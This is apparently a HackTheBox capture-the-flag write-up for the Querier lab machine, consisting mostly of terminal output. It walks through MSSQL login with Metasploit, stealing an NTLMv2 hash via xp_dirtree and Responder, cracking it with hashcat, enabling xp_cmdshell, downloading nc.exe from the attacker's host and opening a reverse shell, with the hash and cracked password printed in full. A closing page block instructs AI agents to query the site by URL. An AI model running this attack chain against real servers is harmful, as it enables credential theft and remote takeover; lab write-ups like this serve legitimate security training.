# 4 mssql using msf ```bash use auxiliary/scanner/mssql/mssql_login msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 10.10.10.125 RHOSTS => 10.10.10.125 msf6 auxiliary(scanner/mssql/mssql_login) > set USERNAME reporting USERNAME => reporting msf6 auxiliary(scanner/mssql/mssql_login) > set PASSWORD PcwTWTHRwryjc$c6 msf6 auxiliary(scanner/mssql/mssql_login) > set USE_WINDOWS_AUTHENT true USE_WINDOWS_AUTHENT => true msf6 auxiliary(scanner/mssql/mssql_login) > run [*] 10.10.10.125:1433 - 10.10.10.125:1433 - MSSQL - Starting authentication scanner. [!] 10.10.10.125:1433 - No active DB -- Credential data will not be saved! [+] 10.10.10.125:1433 - 10.10.10.125:1433 - Login Successful: WORKSTATION\reporting:PcwTWTHRwryjc$c6 [*] 10.10.10.125:1433 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution complete # trying to steal NTLM Creds msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USERNAME reporting USERNAME => reporting msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set PASSWORD PcwTWTHRwryjc$c6 PASSWORD => PcwTWTHRwryjc$c6 msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USE_WINDOWS_AUTHENT true USE_WINDOWS_AUTHENT => true # start responder | sudo responder -I tun0 msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > run [*] 10.10.10.125:1433 - DONT FORGET to run a SMB capture or relay module! [*] 10.10.10.125:1433 - Forcing SQL Server at 10.10.10.125 to auth to 10.10.14.24 via xp_dirtree... [+] 10.10.10.125:1433 - Successfully executed xp_dirtree on 10.10.10.125 [+] 10.10.10.125:1433 - Go check your SMB relay or capture module for goodies! [*] 10.10.10.125:1433 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed [SMB] NTLMv2-SSP Client : 10.10.10.125 [SMB] NTLMv2-SSP Username : QUERIER\mssql-svc [SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:f8ae4ad0769fd34e:3C53678686FB91DF9D3EAF286B5BBC19:0101000000000000009F86B14BD6D701EC153CB908CBCE57000000000200080038004B0052004E0001001E00570049004E002D0047004C005800300050004A00370031004A004200520004003400570049004E002D0047004C005800300050004A00370031004A00420052002E0038004B0052004E002E004C004F00430041004C000300140038004B0052004E002E004C004F00430041004C000500140038004B0052004E002E004C004F00430041004C0007000800009F86B14BD6D701060004000200000008003000300000000000000000000000003000009B3FD06070E3AA7D9FF0AB1E49CDE69779EDDCB1936BAE1FDB0B22BAF8E4DE150A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000 https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ $ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show MSSQL-SVC::QUERIER:f8ae4ad0769fd34e:3c53678686fb91df9d3eaf286b5bbc19:0101000000000000009f86b14bd6d701ec153cb908cbce57000000000200080038004b0052004e0001001e00570049004e002d0047004c005800300050004a00370031004a004200520004003400570049004e002d0047004c005800300050004a00370031004a00420052002e0038004b0052004e002e004c004f00430041004c000300140038004b0052004e002e004c004f00430041004c000500140038004b0052004e002e004c004f00430041004c0007000800009f86b14bd6d701060004000200000008003000300000000000000000000000003000009b3fd06070e3aa7d9ff0ab1e49cde69779eddcb1936bae1fdb0b22baf8e4de150a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003400000000000000000000000000:corporate568 $ mssqlclient.py QUERIER/mssql-svc:corporate568@10.10.10.125 -windows-auth Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(QUERIER): Line 1: Changed database context to 'master'. [*] INFO(QUERIER): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL> enable_xp_cmdshell [*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> EXEC xp_cmdshell "whoami" output ------------------------------ querier\mssql-svc # shell using EXEC xp_cmdshell "powershell -c (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24/nc.exe','c:\users\public\nc.exe');" EXEC xp_cmdshell "c:\users\public\nc.exe -e cmd.exe 10.10.14.24 6969" $ nc -lvnp 6969 listening on [any] 6969 ... connect to [10.10.14.24] from (UNKNOWN) [10.10.10.125] 49681 Microsoft Windows [Version 10.0.17763.292] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami querier\mssql-svc C:\Windows\system32>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled C:\Windows\system32>systeminfo Host Name: QUERIER OS Name: Microsoft Windows Server 2019 Standard OS Version: 10.0.17763 N/A Build 17763 System Type: x64-based PC Hotfix(s): 6 Hotfix(s) Installed. ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/querier/4-mssql-using-msf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.